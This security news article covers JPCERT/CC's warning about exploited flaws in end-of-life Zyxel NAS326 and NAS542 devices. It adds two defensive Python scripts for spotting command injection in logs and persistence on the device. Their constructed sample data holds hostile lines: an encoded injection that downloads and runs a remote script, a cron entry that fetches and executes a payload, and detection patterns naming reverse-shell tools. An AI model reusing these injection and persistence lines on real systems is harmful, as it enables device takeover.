JPCERT/CC issued a warning after observing attackers exploiting multiple vulnerabilities in Zyxel NAS devices that many organizations still operate on internal and remote-accessible networks. The flaws affect end-of-life NAS models and give threat actors a direct path to arbitrary command execution, full device takeover, and eventual entry into the broader environments that depend on the compromised NAS units for storage or backups.
The exploitation appears widespread. Attackers rapidly scan for vulnerable appliances, execute injected payloads, and deploy automation to maintain control. Because these devices often sit in trusted network zones, every successful compromise carries downstream risk to additional assets.
JPCERT/CC confirmed exploitation of three specific vulnerabilities tracked as CVE-2024-29972, CVE-2024-29973, and CVE-2024-29974. These bugs affect Zyxel NAS326 and NAS542 devices, which reached end-of-vulnerability-support on 31 December 2023. Zyxel did publish one-off hotfix firmware for these three issues in June 2024 despite the end-of-life status, but many units never received it, no further fixes are coming, and many organizations leave the NAS web interface exposed, so attackers continue to abuse the flaws aggressively.
All three bugs are reachable without authentication: two are command injections that push attacker-controlled input into the firmware's web request handlers, and the third allows code execution through a crafted configuration upload. No credentials or special configuration are needed; a default deployment with its web interface reachable is enough. This makes the flaws ideal for botnet operators, cryptomining crews, and access brokers that sell footholds to ransomware affiliates.
Ransomware-style campaigns are beginning to touch these devices, and researchers already link some exploitation waves to infrastructure associated with credential-harvesting and lateral-movement frameworks. No single actor owns these vulnerabilities; the activity pattern resembles opportunistic, mass-scale harvesting designed to expand access inventories rapidly.
Attack technique: fast scan, fast inject, fast persist
Active exploit patterns JPCERT/CC is seeing
Attackers hunt exposed NAS units by scanning for the vulnerable web endpoints. As soon as they identify a target, they inject commands that fetch remote payloads, create persistence through scheduled tasks (cron entries) or modified startup scripts, and open tunnels to external infrastructure. Because these NAS devices often store corporate data or backups, the foothold lets adversaries harvest sensitive files and map adjacent network segments.
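The scan-and-inject stage leaves traces in the appliance's web access log before any payload runs. The script below is an added example written for this article, not JPCERT/CC's or Zyxel's code. It assumes the NAS (or a reverse proxy in front of it) writes Combined Log Format lines and that the vulnerable handlers live under /cgi-bin/; both are assumptions, the handler names in the sample lines are hypothetical, and the sample log itself is constructed. It decodes the query string repeatedly, because double-encoded separators (%253b, %250a) are a routine way past naive URL filters, and flags requests that carry shell metacharacters or the fetch-and-run tooling of a stage-one dropper.

```python
"""Flag command-injection attempts against a NAS web UI in access-log lines.

Added example for this article; not JPCERT/CC's or Zyxel's code. Assumes
Combined Log Format and that vulnerable handlers sit under /cgi-bin/ (both
assumptions); handler names in SAMPLE_LOG are hypothetical.
"""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters a legitimate UI parameter never needs: command
# separators, pipes, subshells and a bare newline.
META_RE = re.compile(r'[;|`]|\$\(|&&|\n')
# Tooling typical of a stage-one payload: fetch a dropper, mark it executable, run it.
FETCH_RE = re.compile(r'\b(wget|curl|tftp|busybox|nc|chmod\s+\+?x)\b', re.I)


def decode_repeatedly(s, rounds=3):
    """URL-decode until stable: attackers double-encode %3b or %0a to slip past naive URL filters."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_line(line):
    """Return a finding dict for a suspicious /cgi-bin/ request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.startswith('/cgi-bin/'):
        return None
    # Only the query string is visible here; injections carried in POST bodies
    # or cookies need the proxy to log those fields or a network capture.
    query = decode_repeatedly(parts.query)
    kinds = []
    if META_RE.search(query):
        kinds.append('shell-metachar')
    if FETCH_RE.search(query):
        kinds.append('payload-fetch')
    if not kinds:
        return None
    return {'ip': m.group('ip'), 'path': parts.path, 'status': int(m.group('status')),
            'kinds': kinds, 'query': query}


def find_injection_attempts(lines):
    """Run analyse_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(analyse_line, lines) if hit]


# Constructed sample log; addresses are documentation ranges, handler names hypothetical.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Nov/2025:14:03:11 +0000] "GET /cgi-bin/login.cgi?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [10/Nov/2025:14:03:12 +0000] "GET /cgi-bin/some_handler.cgi?id=1%3bwget%20http%3a%2f%2f198.51.100.77%2fx.sh%20-O%20%2ftmp%2fx%3bsh%20%2ftmp%2fx HTTP/1.1" 200 0 "-" "python-requests/2.31"',
    '198.51.100.77 - - [10/Nov/2025:14:03:13 +0000] "GET /cgi-bin/some_handler.cgi?id=1%250acurl%20198.51.100.77 HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    '203.0.113.5 - - [10/Nov/2025:14:03:14 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit['ip'], hit['status'], hit['kinds'], repr(hit['query']))
```

A 200 with a zero-byte body, or a 500, immediately after a metacharacter-laden request is the pattern to pivot on: it usually means the injected command ran (or crashed the handler) rather than being rejected. Group hits by source address, since the same scanner typically probes several handlers in quick succession.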
Why these end-of-life devices remain high-value
Although Zyxel has retired support, many organizations continue to depend on these NAS systems because they sit deep within legacy workflows. Attackers understand this operational inertia. With no further fixes coming, the devices offer an evergreen entry route, which makes them ideal for long-term exploitation, especially when the NAS holds internal documentation, VM images, intellectual property or unencrypted datasets.
Ransomware groups can abuse compromised NAS units as entry points
Because threat actors frequently pair command injection with credential theft and network pivoting, these Zyxel NAS flaws offer a straightforward way to set the stage for ransomware. Once attackers gain a foothold, they often enumerate SMB shares, search for privileged accounts, and stage encryption tooling inside the trusted network. With NAS devices acting as storage hubs, ransomware operators can use them to move laterally or corrupt backups.
JPCERT/CC's advice: isolate immediately
JPCERT/CC urges organizations to remove NAS326 and NAS542 devices from external exposure, physically isolate them if necessary, and replace them with supported hardware. Some defenders try to mitigate the command injection with firewall rules or by blocking known URLs, but attackers typically bypass such superficial blocking by reaching alternate execution points or chaining several injection vectors.
Why this matters for organizations in 2025
Organizations continue shifting toward hybrid infrastructures, and adversaries increasingly exploit overlooked appliances to bridge cloud and on-prem environments. Consequently, compromised NAS systems now create bidirectional risk: attackers can steal data from internal shares while using the NAS to exfiltrate cloud credentials or API keys stored within developer backups. Because many emerging campaigns focus on credential harvesting as a precursor to ransomware, every compromised NAS introduces strategic exposure that far exceeds the applianceโs original role.
FAQs
Q: How do I know if my NAS326 or NAS542 is compromised?
Check for suspicious processes, unexpected scheduled tasks, new startup scripts, unexplained outbound traffic, or unknown binaries stored within user-accessible shares. Because attackers often modify configuration files, any unexpected behaviour should trigger a deeper forensic review, ideally from a disk image rather than on the live device.
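The first three of those checks (scheduled tasks, startup scripts, outbound connections) can be scripted against snapshots pulled off the unit. The following is an added example for this article, not JPCERT/CC's or Zyxel's tooling. It assumes you can copy the crontab, the init scripts and a `netstat -tn` listing off the NAS (over SSH or a serial console) and that you hold the same files from a clean device on the same firmware as a baseline; every snapshot in the block is constructed and the script paths in it are hypothetical. New cron or init entries are diffed against the baseline and labelled by the idioms they contain, and established sockets are filtered to peers outside RFC 1918 space and your own allow list.

```python
"""Host-side triage of a Linux-based NAS for persistence and beaconing artefacts.

Added example for this article; not JPCERT/CC's or Zyxel's tooling. Assumes
crontab/init/netstat snapshots from the device plus a clean baseline (an
assumption); all snapshots below are constructed, script paths hypothetical.
"""
import ipaddress
import re

# Idioms with no business in a storage appliance's cron table or init scripts.
SUSPICIOUS = [
    (re.compile(r'\b(wget|curl|tftp)\b'), 'downloader'),
    (re.compile(r'/(tmp|var/tmp|dev/shm)/'), 'runs-from-tmpfs'),
    (re.compile(r'\bnc\b.*\s-e\b|/dev/tcp/|\bbash -i\b'), 'reverse-shell'),
    (re.compile(r'\bbase64\s+(-d|--decode)\b'), 'encoded-payload'),
    (re.compile(r'\bchmod\s+\+?x\b'), 'marks-executable'),
]

# Ranges treated as "inside": RFC 1918 plus loopback. Extend with your own routed prefixes.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16', '127.0.0.0/8')]

NETSTAT_RE = re.compile(r'^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)')


def _entries(text):
    """Non-blank, non-comment lines of a crontab or init script, whitespace-normalised."""
    return {' '.join(ln.split()) for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith('#')}


def new_entries(baseline, current):
    """Lines present in the current snapshot but absent from the clean baseline."""
    return sorted(_entries(current) - _entries(baseline))


def classify(entry):
    """Labels for each suspicious idiom in one entry; an empty list still means 'new, go look'."""
    return [label for rx, label in SUSPICIOUS if rx.search(entry)]


def triage_startup(baseline, current):
    """(entry, labels) for each line that was not in the baseline."""
    return [(e, classify(e)) for e in new_entries(baseline, current)]


def external_connections(netstat_text, allowed=()):
    """ESTABLISHED sockets whose peer is outside the internal ranges and not on the allow list.

    A NAS talking to an arbitrary external host on a high port is the tunnel the
    article describes; legitimate peers (backup target, update server) go in `allowed`.
    """
    known = INTERNAL_NETS + [ipaddress.ip_network(a) for a in allowed]
    flagged = []
    for ln in netstat_text.splitlines():
        m = NETSTAT_RE.match(ln.strip())
        if not m or m.group(5) != 'ESTABLISHED':
            continue
        peer = ipaddress.ip_address(m.group(3))
        if any(peer in net for net in known):
            continue
        flagged.append((f'{m.group(1)}:{m.group(2)}', f'{peer}:{m.group(4)}'))
    return flagged


# Constructed snapshots (documentation address ranges, hypothetical script names).
BASELINE_CRON = """\
# min hour dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/bin/smart_check.sh
"""
CURRENT_CRON = """\
# min hour dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/bin/smart_check.sh
*/10 * * * * /tmp/.x/upd.sh
@reboot wget -q http://198.51.100.77/a -O /tmp/a && chmod +x /tmp/a && /tmp/a
"""
NETSTAT = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.10.20:445       192.168.10.57:51322     ESTABLISHED
tcp        0      0 192.168.10.20:443       192.168.10.5:60044      ESTABLISHED
tcp        0      0 192.168.10.20:39844     198.51.100.77:4444      ESTABLISHED
tcp        0      0 192.168.10.20:40212     203.0.113.10:443        TIME_WAIT
"""

if __name__ == '__main__':
    for entry, labels in triage_startup(BASELINE_CRON, CURRENT_CRON):
        print('NEW', labels or ['unclassified'], entry)
    for local, peer in external_connections(NETSTAT, allowed=['203.0.113.0/24']):
        print('EXTERNAL', local, '->', peer)
```

The baseline diff matters more than the pattern list: an attacker who drops a persistence entry with an innocuous name and path will not match any idiom, but it will still show up as a line the clean unit does not have. Run the same comparison over `/etc/init.d`, `rc.local` and any vendor-specific autostart directories, and treat the live unit as untrusted while you do it.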
Q: Can I mitigate these flaws without replacing the device?
Replacement remains the only reliable long-term path. Apply the hotfix firmware Zyxel published for these three CVEs in June 2024 if the unit is still on an older build, and keep the web interface off the internet, but treat both as stopgaps: network isolation only lowers exposure, and determined attackers still find paths to execution if the device stays reachable.
Q: Why do attackers target end-of-support hardware?
Attackers value predictable, unpatchable systems because each one provides a guaranteed entry point. As defenders retire other vulnerable equipment, EoL storage appliances now represent high-value footholds.